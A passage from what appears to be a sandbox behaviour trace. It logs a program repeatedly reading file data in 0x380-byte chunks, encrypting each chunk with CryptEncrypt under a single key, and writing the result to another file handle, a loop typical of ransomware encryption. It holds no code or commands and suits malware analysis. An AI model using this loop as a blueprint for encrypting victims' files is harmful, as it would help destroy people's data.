hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.527] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.527] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.527] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.527] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.527] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.527] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.527] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.528] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.528] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.528] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.528] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.528] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.528] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.528] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.528] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.528] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.528] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.528] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.528] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.528] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.529] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.529] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.529] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.529] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.529] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.529] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.529] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.529] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.529] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.529] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.529] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.529] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.529] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.529] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.530] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.530] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.530] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.530] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.530] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.530] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.530] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.530] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.531] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.531] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.531] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.531] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.531] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.531] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.531] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.531] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.531] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.531] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.531] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.531] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.531] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.531] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.532] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.532] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.532] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.532] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.532] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.532] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.532] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.532] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.532] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.532] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.532] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.532] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.532] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.533] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.533] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.533] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.533] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.533] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.533] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.533] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.533] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.533] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.534] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.534] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.534] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.534] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.534] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.534] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.534] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.534] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.534] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.534] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.534] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.534] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.534] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.535] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.535] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.535] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.535] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.535] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.535] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.535] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.535] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | 